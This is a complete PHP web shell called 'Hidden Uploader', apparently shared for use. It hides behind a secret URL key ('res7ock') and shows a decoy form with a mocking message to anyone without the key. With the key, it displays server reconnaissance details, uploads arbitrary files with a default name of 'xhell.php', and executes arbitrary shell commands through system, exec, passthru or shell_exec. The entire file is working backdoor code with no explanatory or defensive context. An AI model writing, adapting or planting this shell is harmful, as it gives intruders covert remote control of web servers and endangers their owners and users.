Hidden Uploader + Command

1. <?php if(isset($_GET['res7ock'])){ ?> <title>Hidden Uploader</title>
2. <style>
3. @font-face {
4.   font-family: 'Comic Sans MS';
5.   font-style: normal;
6.   font-weight: 400;
7.   src: local('Comic Sans MS'), local('ComicSansMS'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format('truetype');
8. }
9. body {
10.     background:black;
11.     color:green;
12.     font-family: Comic Sans MS ;
13.     }
14. a {
15.     color:dodgerblue;
16.     font-family: Comic Sans MS ;
17. }
18. </style>
19. <center>
20. <?php
21. //hdd
22. function hdd($s) {
23. if($s >= 1073741824)
24. return sprintf('%1.2f',$s / 1073741824 ).' GB';
25. elseif($s >= 1048576)
26. return sprintf('%1.2f',$s / 1048576 ) .' MB';
27. elseif($s >= 1024)
28. return sprintf('%1.2f',$s / 1024 ) .' KB';
29. else
30. return $s .' B';
31. }
32. //func cmd
33. function exe($cmd) {    
34. if(function_exists('system')) {    
35.         @ob_start();       
36.         @system($cmd);     
37.         $buff = @ob_get_contents();        
38.         @ob_end_clean();       
39.         return $buff;  
40.     } elseif(function_exists('exec')) {        
41.         @exec($cmd,$results);      
42.         $buff = "";        
43.         foreach($results as $result) {         
44.             $buff .= $result;      
45.         } return $buff;    
46.     } elseif(function_exists('passthru')) {        
47.         @ob_start();       
48.         @passthru($cmd);       
49.         $buff = @ob_get_contents();        
50.         @ob_end_clean();       
51.         return $buff;  
52.     } elseif(function_exists('shell_exec')) {      
53.         $buff = @shell_exec($cmd);     
54.         return $buff;  
55.     }
56. }
57. // Curl Script
58. if(extension_loaded('curl')){
59.     $curls="<font color='green'><b>ON</b></font>";
60.     }
61.     else{
62.         $curls="<font color='red'><b>OFF</b></font>";
63.         }
64.         echo "<center><font color=red>";
65. //uname
66.         echo php_uname();
67. //safe_mode
68.      if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE;
69. else $safemode = FALSE;
70. if($safemode)
71. $buff .= "<font color=\"green\">ON</font>"; else $buff .= "<font color=\"dodgerblue\">OFF</font>";
72. //disc_funct
73. $ds = @ini_get("disable_functions");
74. $dis = (!empty($ds)) ? "<font color=black>$ds</font>" : "<font color=green>None</font>";
75. //start
76.     echo "<br>Safe Mode : ".$buff." | Curl : ".$curls." | IP : <font color=green> ".$_SERVER["SERVER_ADDR"]."</font> | Nserver : <font color=green> ".$_SERVER["SERVER_NAME"]." $code</font> | Server : <font color=green> ".$_SERVER["SERVER_SOFTWARE"]."</font> ";
77.     echo "<br>";
78.     echo "Disk: <font color=green>".hdd(disk_free_space("/"))."</font> / <font color=red>".hdd(disk_total_space("/"))."</font>";
79.     echo " </font>";
80. ?>
81. <?php
82. //file upload
83. if (isset($_REQUEST['ufile'])) { $ufile = $_POST ['ufile' ] ; }
84. if (isset($_REQUEST['upload'])) { if ($_POST ['upload' ]){
85. if (@copy ($_FILES ['file' ]['tmp_name' ], $ufile )) {
86. $njay = "<script>alert('Sukses');</script>" ;
87. } else {
88. $njay = "<script>alert('Error');</script>";
89. }
90. }
91. }
92. ?>
93. <pre>
94. +----------------------------------------------+</pre>
95. <form action="" method="post" enctype="multipart/form-data">
96. <input type="file" style="background:black;border:1px solid green;color:green;font-family: Comic Sans MS ; " name="file" />
97. <input type="text" style="background:black;border:1px solid green;color:green;font-family: Comic Sans MS ;height:25px; " name="ufile" value="xhell.php"/>
98. <input style="background: darkred;border:0;color:black;font-family: Comic Sans MS ; height:25px; " name="upload" type="submit" value="Upload" /> <?php echo "$njay"; ?>
99. </form>
100. </center>
101. <center>
102. <?php
103. echo "<form method='post'>
104.                 <font>root@x48 $ </font>
105.                 <input style='background:black;border:1px solid green;color:green;font-family: Comic Sans MS ;height:25px;' type='text' size='30' height='10' name='cmd'><input type='submit' style='background: darkred;color:black;border:0px;font-family: Comic Sans MS ; height:25px;' name='execmd' value=' >> '>
106.                 </form>";
107. //cmd maz
108.                 if($_POST['execmd']) {
109.                     echo ' <pre>
110. +----------------------------------------------+</pre> ';
111.         echo '<table><tr><td>';
112.                     echo "<pre>".exe($_POST['cmd'])."</pre>";
113.                     echo '</td></tr></table>';
114.                 }
115.                 ?>
116. <pre>
117. +----------------------------------------------+</pre>
118. $ Hidden Uploader $
119.                 </center>
120. <?php } else { ?>
121. <form method="post"><input type="file"><input type="submit" name="go"></form>
122. <?php if(isset($_POST['go'])){echo "peak namanya juga hidden uploader ya pasti pake kata kunci lah :'v'";}} ?>